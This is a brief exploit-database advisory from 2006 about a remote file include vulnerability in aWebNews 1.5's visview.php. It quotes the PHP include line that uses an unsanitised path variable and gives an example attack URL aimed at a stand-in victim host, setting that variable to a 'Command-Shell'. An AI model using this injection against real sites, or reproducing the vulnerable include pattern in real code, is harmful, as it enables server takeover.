[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

aWebNews <= 1.5 (visview.php) Remote File Include Vulnerability

Author
SpC-x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-513
Category
web applications
Date add
12-06-2006
Platform
unsorted
===============================================================
aWebNews <= 1.5 (visview.php) Remote File Include Vulnerability
===============================================================




Credit : SpC-x

mail : SpC-x@bsdmail.org

# SaVSaK.CoM | SpC-x - The-BeKiR |

# aWebNews 1.0 version - Remote File Include Vulnerabilities

# Risk : High

# Class: Remote

# Script : aWebNews

# Credits : SpC-x

# Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# include "" . $path_to_news . "config.php";
# $db = mysql_connect($db_host,$db_user,$db_pass);

# Vulnerable :

# http://www.victim.com/aWebNews/visview.php?path_to_news=Command-Shell



#  0day.today [2024-12-24]  #